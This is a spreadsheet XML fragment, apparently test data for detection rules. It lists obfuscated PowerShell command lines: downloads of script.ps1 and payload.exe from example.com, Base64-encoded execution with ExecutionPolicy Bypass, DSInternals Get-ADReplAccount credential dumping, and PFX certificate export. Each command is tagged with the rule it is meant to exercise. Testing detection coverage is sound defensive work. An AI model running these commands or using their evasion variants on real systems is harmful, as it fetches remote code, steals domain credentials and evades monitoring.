    <row r="464" ht="15.75" customHeight="1" s="42">
      <c r="A464" s="43" t="n"/>
      <c r="B464" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C464" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D464" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E464" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$client = New-Object System.Net.WebClient; $client.DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F464" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G464" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H464" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I464" s="44" t="n"/>
      <c r="J464" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K464" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="465" ht="15.75" customHeight="1" s="42">
      <c r="A465" s="43" t="n"/>
      <c r="B465" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C465" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D465" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E465" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$client = New-Object System.Net.WebClient; $client.DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F465" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G465" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H465" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I465" s="43" t="n"/>
      <c r="J465" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K465" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="466" ht="15.75" customHeight="1" s="42">
      <c r="A466" s="43" t="n"/>
      <c r="B466" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C466" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D466" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E466" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(New-Object Net.WebC`lient).DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F466" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G466" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H466" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I466" s="44" t="n"/>
      <c r="J466" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K466" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="467" ht="15.75" customHeight="1" s="42">
      <c r="A467" s="43" t="n"/>
      <c r="B467" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C467" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D467" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E467" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"Command" "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile 'C:\Windows\Temp\payload.exe'"</t>
        </is>
      </c>
      <c r="F467" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G467" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H467" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I467" s="44" t="n"/>
      <c r="J467" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K467" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="468" ht="15.75" customHeight="1" s="42">
      <c r="A468" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B468" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_dsinternals_cmdlets</t>
        </is>
      </c>
      <c r="C468" s="44" t="inlineStr">
        <is>
          <t>DSInternals Suspicious PowerShell Cmdlets</t>
        </is>
      </c>
      <c r="D468" s="44" t="inlineStr">
        <is>
          <t>43d91656-a9b2-4541-b7e2-6a9bd3a13f4e</t>
        </is>
      </c>
      <c r="E468" s="44" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {&amp; 'Get-ADReplAccount' -All -Server $ENV:logonserver.TrimStart(""")}</t>
        </is>
      </c>
      <c r="F468" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G468" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H468" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I468" s="43" t="n"/>
      <c r="J468" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K468" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="469" ht="15.75" customHeight="1" s="42">
      <c r="A469" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B469" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_dsinternals_cmdlets</t>
        </is>
      </c>
      <c r="C469" s="44" t="inlineStr">
        <is>
          <t>DSInternals Suspicious PowerShell Cmdlets</t>
        </is>
      </c>
      <c r="D469" s="44" t="inlineStr">
        <is>
          <t>43d91656-a9b2-4541-b7e2-6a9bd3a13f4e</t>
        </is>
      </c>
      <c r="E469" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "powershell.exe &amp; {Get-ADRepl^Account -All -Server $ENV:logonserver.TrimStart(""")}"</t>
        </is>
      </c>
      <c r="F469" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G469" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H469" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I469" s="43" t="n"/>
      <c r="J469" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K469" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="470" ht="15.75" customHeight="1" s="42">
      <c r="A470" s="43" t="n"/>
      <c r="B470" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C470" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D470" s="44" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E470" s="44" t="inlineStr">
        <is>
          <t>powershell.exe "-en"c JABoAG8AcwB0AG4AYQBtAGUA</t>
        </is>
      </c>
      <c r="F470" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G470" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H470" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I470" s="43" t="n"/>
      <c r="J470" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K470" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="471" ht="15.75" customHeight="1" s="42">
      <c r="A471" s="43" t="n"/>
      <c r="B471" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C471" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D471" s="44" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E471" s="44" t="inlineStr">
        <is>
          <t>powershell.exe "-en" c JABoAG8AcwB0AG4AYQBtAGUA</t>
        </is>
      </c>
      <c r="F471" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G471" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H471" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I471" s="43" t="n"/>
      <c r="J471" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K471" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="472" ht="15.75" customHeight="1" s="42">
      <c r="A472" s="43" t="n"/>
      <c r="B472" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C472" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D472" s="44" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E472" s="44" t="inlineStr">
        <is>
          <t>powershell.exe "-en"" c JABoAG8AcwB0AG4AYQBtAGUA</t>
        </is>
      </c>
      <c r="F472" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G472" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H472" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I472" s="43" t="n"/>
      <c r="J472" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K472" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="473" ht="15.75" customHeight="1" s="42">
      <c r="A473" s="43" t="n"/>
      <c r="B473" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C473" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D473" s="44" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E473" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"enc" JABoAG8AcwB0AG4AYQBtAGUA -"Encoding" Unicode</t>
        </is>
      </c>
      <c r="F473" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G473" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H473" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I473" s="43" t="n"/>
      <c r="J473" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K473" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="474" ht="15.75" customHeight="1" s="42">
      <c r="A474" s="43" t="n"/>
      <c r="B474" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C474" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D474" s="44" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E474" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"e" JABoAG8AcwB0AG4AYQBtAGUA</t>
        </is>
      </c>
      <c r="F474" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G474" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H474" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I474" s="43" t="n"/>
      <c r="J474" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K474" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="475" ht="15.75" customHeight="1" s="42">
      <c r="A475" s="43" t="n"/>
      <c r="B475" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C475" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D475" s="44" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E475" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"e" JABoAG8AcwB0AG4AYQBtAGUA</t>
        </is>
      </c>
      <c r="F475" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G475" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H475" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I475" s="44" t="n"/>
      <c r="J475" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K475" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="476" ht="15.75" customHeight="1" s="42">
      <c r="A476" s="43" t="n"/>
      <c r="B476" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C476" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D476" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E476" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F476" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G476" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H476" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I476" s="43" t="n"/>
      <c r="J476" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K476" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="477" ht="15.75" customHeight="1" s="42">
      <c r="A477" s="43" t="n"/>
      <c r="B477" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C477" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D477" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E477" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F477" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G477" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H477" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I477" s="44" t="n"/>
      <c r="J477" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K477" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="478" ht="15.75" customHeight="1" s="42">
      <c r="A478" s="43" t="n"/>
      <c r="B478" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C478" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D478" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E478" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -EncodedCommand V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F478" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G478" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H478" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I478" s="44" t="n"/>
      <c r="J478" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K478" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="479" ht="15.75" customHeight="1" s="42">
      <c r="A479" s="43" t="n"/>
      <c r="B479" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C479" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D479" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E479" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -encODedcommAnd V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F479" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G479" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H479" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I479" s="43" t="n"/>
      <c r="J479" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K479" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="480" ht="15.75" customHeight="1" s="42">
      <c r="A480" s="43" t="n"/>
      <c r="B480" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C480" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D480" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E480" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F480" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G480" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H480" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I480" s="43" t="n"/>
      <c r="J480" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K480" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="481" ht="15.75" customHeight="1" s="42">
      <c r="A481" s="43" t="n"/>
      <c r="B481" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C481" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D481" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E481" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F481" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G481" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H481" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I481" s="43" t="n"/>
      <c r="J481" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K481" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="482" ht="15.75" customHeight="1" s="42">
      <c r="A482" s="43" t="n"/>
      <c r="B482" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C482" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D482" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E482" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXeCutiONPolICY Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F482" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G482" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H482" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I482" s="43" t="n"/>
      <c r="J482" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K482" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="483" ht="15.75" customHeight="1" s="42">
      <c r="A483" s="43" t="n"/>
      <c r="B483" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C483" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D483" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E483" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass /"EncodedCommand" V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F483" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G483" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H483" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I483" s="43" t="n"/>
      <c r="J483" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K483" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="484" ht="15.75" customHeight="1" s="42">
      <c r="A484" s="43" t="n"/>
      <c r="B484" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C484" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D484" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E484" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -EncodeDcomMAND V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F484" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G484" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H484" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I484" s="43" t="n"/>
      <c r="J484" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K484" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="485" ht="15.75" customHeight="1" s="42">
      <c r="A485" s="43" t="n"/>
      <c r="B485" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C485" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D485" s="44" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E485" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "[scriptblock]::Create((cat C:\temp\payload.ps1 -raw)).Invoke()"</t>
        </is>
      </c>
      <c r="F485" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G485" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H485" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I485" s="44" t="n"/>
      <c r="J485" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K485" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="486" ht="15.75" customHeight="1" s="42">
      <c r="A486" s="43" t="n"/>
      <c r="B486" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C486" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D486" s="44" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E486" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex (gc C:\temp\payload.ps1 -raw)"</t>
        </is>
      </c>
      <c r="F486" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G486" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H486" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I486" s="44" t="n"/>
      <c r="J486" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K486" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="487" ht="15.75" customHeight="1" s="42">
      <c r="A487" s="43" t="n"/>
      <c r="B487" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C487" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D487" s="44" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E487" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex (Get-Content C:\temp\payload.ps1 -ra)"</t>
        </is>
      </c>
      <c r="F487" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G487" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H487" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I487" s="43" t="n"/>
      <c r="J487" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K487" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="488" ht="15.75" customHeight="1" s="42">
      <c r="A488" s="43" t="n"/>
      <c r="B488" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C488" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D488" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E488" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F488" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G488" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H488" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I488" s="44" t="n"/>
      <c r="J488" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K488" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="489" ht="15.75" customHeight="1" s="42">
      <c r="A489" s="43" t="n"/>
      <c r="B489" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C489" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D489" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E489" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F489" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G489" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H489" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I489" s="44" t="n"/>
      <c r="J489" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K489" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="490" ht="15.75" customHeight="1" s="42">
      <c r="A490" s="43" t="n"/>
      <c r="B490" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C490" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D490" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E490" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F490" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G490" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H490" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I490" s="43" t="n"/>
      <c r="J490" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K490" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="491" ht="15.75" customHeight="1" s="42">
      <c r="A491" s="43" t="n"/>
      <c r="B491" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C491" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D491" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E491" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F491" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G491" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H491" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I491" s="43" t="n"/>
      <c r="J491" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K491" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="492" ht="15.75" customHeight="1" s="42">
      <c r="A492" s="43" t="n"/>
      <c r="B492" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C492" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D492" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E492" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F492" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G492" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H492" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I492" s="43" t="n"/>
      <c r="J492" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K492" s="44" t="b">
        <v>0</v>
      </c>
    </row>
